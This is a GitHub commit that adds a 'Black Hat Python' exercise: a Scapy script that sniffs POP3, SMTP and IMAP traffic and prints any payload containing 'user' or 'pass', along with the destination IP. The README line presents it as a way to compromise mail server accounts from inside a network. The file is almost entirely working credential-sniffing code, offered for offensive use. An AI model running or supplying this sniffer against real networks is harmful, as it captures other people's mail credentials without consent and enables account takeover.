Mail sniffer using BPF filters to drill down specific packets

DhanushNehru · Jun 25, 2024 · 9ff362b · 9ff362b
1 parent ff1b225
commit 9ff362b
Show file tree

Hide file tree

Showing 2 changed files with 26 additions and 0 deletions.
diff --git a/Black Hat Python/chapter_04/README.md b/Black Hat Python/chapter_04/README.md
@@ -7,4 +7,10 @@ sudo pip3 install scapy
 - A simple sniffer 
 ```
 sudo python3 mail_sniffer.py
+```
+
+### mail_sniffer_using_BPF_syntax.py
+- If you are on a network where you know you're already on their internal network and you want to compromise some mail server accounts then you could do that by sniffing the network by running the below command
+```
+sudo python3 mail_sniffer_using_BPF_syntax.py
 ```
diff --git a/Black Hat Python/chapter_04/mail_sniffer_using_BPF_syntax.py b/Black Hat Python/chapter_04/mail_sniffer_using_BPF_syntax.py
@@ -0,0 +1,20 @@
+from scapy.all import sniff, TCP, IP
+
+# The packet callback function
+def packet_callback(packet):
+    # Check if the packet has a TCP payload
+    if packet.haslayer(TCP) and packet[TCP].payload:
+        # Convert the payload to a string
+        mypacket = str(packet[TCP].payload)
+        # Check for the presence of 'user' or 'pass' in the payload
+        if 'user' in mypacket.lower() or 'pass' in mypacket.lower():
+            # Print the destination IP and the payload
+            print(f"[*] Destination: {packet[IP].dst}")
+            print(f"[*] {str(packet[TCP].payload)}")
+
+def main():
+    # Start sniffing for packets
+    sniff(filter='tcp port 110 or tcp port 25 or tcp port 143', prn=packet_callback, store=0)
+
+if __name__ == '__main__':
+    main()